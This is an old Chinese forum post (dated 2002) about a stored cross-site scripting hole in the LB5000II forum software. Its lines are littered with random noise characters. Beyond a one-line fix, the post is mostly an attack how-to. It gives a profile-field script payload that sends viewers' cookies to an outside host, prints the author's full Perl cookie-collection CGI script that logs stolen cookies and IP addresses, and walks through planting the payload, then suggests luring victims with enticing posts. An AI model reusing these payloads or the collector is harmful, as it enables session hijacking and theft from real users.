漏洞描述:
# C' v) W7 u u f0 ^ LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新
; {( }% Q, d' X8 q: y. E/ S版本是LB5000II v20317b,可以http://www.leoboard.com下载。 $ a, ~# N1 ?3 e: E; r: ?4 t; o
其注册模块未过滤用户资料 最高学历:职业状况:等注册信息 6 w1 U1 H5 o1 e3 a
导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript> 7 \. s! x) ]( X: U
进行攻击,进一步可以通过某中方式收集。测试通过
6 Y) W% {/ q3 o: i/ N: P测试程序:
- W" w- d$ _! H" ~5 { 参考漏洞描述。
: ?4 a' e) ~, |" F9 ~$ x! H% T7 W- W1 b6 J解决方案:
% J3 J, e' |- y$ v1 [' c) Z! ^5 h 对用户提交的资料进行过滤 + X; m5 }& O; u. z* _, y
0 s' X4 z3 \, U( `; h. u7 X2 n2 X+ w* h" I" F
请在s8s8论坛访问 5 v0 V. d1 r7 a* b0 L: u9 v. N
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队
) h$ C9 J9 K" ]& ~; J) L- `那么你在s8s8.net 的cookie将被我所获取. - L1 A. I3 M: U
#!/usr/bin/perl % x0 O4 U: S6 `1 h$ j- q0 W
#leo.cgi
( V7 ]& P: L) Q7 Z7 k, v$url="http://www.s8s8.net";;
0 _4 i8 P: z5 `" v* ?3 \; `% d+ k: I$method=$ENV{"REQUEST_METHOD"}; * R- y+ Y/ [% R9 }9 y
if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};} , b4 `8 p9 E- p, u5 f
else{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));} ' `) Z7 Y: L8 i2 \$ d9 M0 a
$remote_addr=$ENV{"REMOTE_ADDR"}; # Y/ N# \4 O% ~
$buffer=~tr/+/ /;
1 ?+ g* `# U3 b5 n2 }+ `$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg; ; u* g: ~' B. ]" _2 k' D
$buffer=$buffer."|$remote_addr\n"; 9 Z. @7 W/ i5 s0 V* g, i
open(FILE,">>leo.txt");
1 v* K7 U) z& g! tprint FILE $buffer; ' C5 Z) y, G% W* c
close(FILE); 7 n6 k. S0 t% ?6 e; M, @
print "Location:$url\n\n";
$ Z0 ~9 b' v. g上面是我的cookie收集脚本
3 F9 @/ p/ z* n" |- b. e------------------------------------------------------------------------------
) K; G. z& {2 O1 U' J$ Q范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试
% p+ L3 B: A) S用大刀队登陆s8s8论坛,编辑个人资料,
% @) ?8 x% j8 @3 S/ T. e+ S% }用记事本打开编辑网页 " ~, ?, C( J4 {
<option value="中专">中专</option> 这一项改成
( T4 P0 a& B1 F0 k8 B, w1 I2 [<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?'+documents.cookie)</s cript>">中专</option> . j1 b: ~! C! c0 A' b2 ^8 q
% L3 c6 b R) R- `* O编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data"> % H3 { U* V5 U' z
改为 ! ~, G9 G, p2 H8 c( Q
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
6 w, q: h+ S# A. f保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据,
3 p& _5 s0 g! w7 q& E6 W# @这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。
" _! R7 l. o* X+ @9 a1 |% z为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击, ) W( M# F) M8 K2 q
什么算诱惑力呢,自己发挥吧。
. G1 s5 n/ A1 n |
粤公网安备44152102000001号 
发表于 2002-6-6 11:05:22
发表于 2002-6-24 19:03:26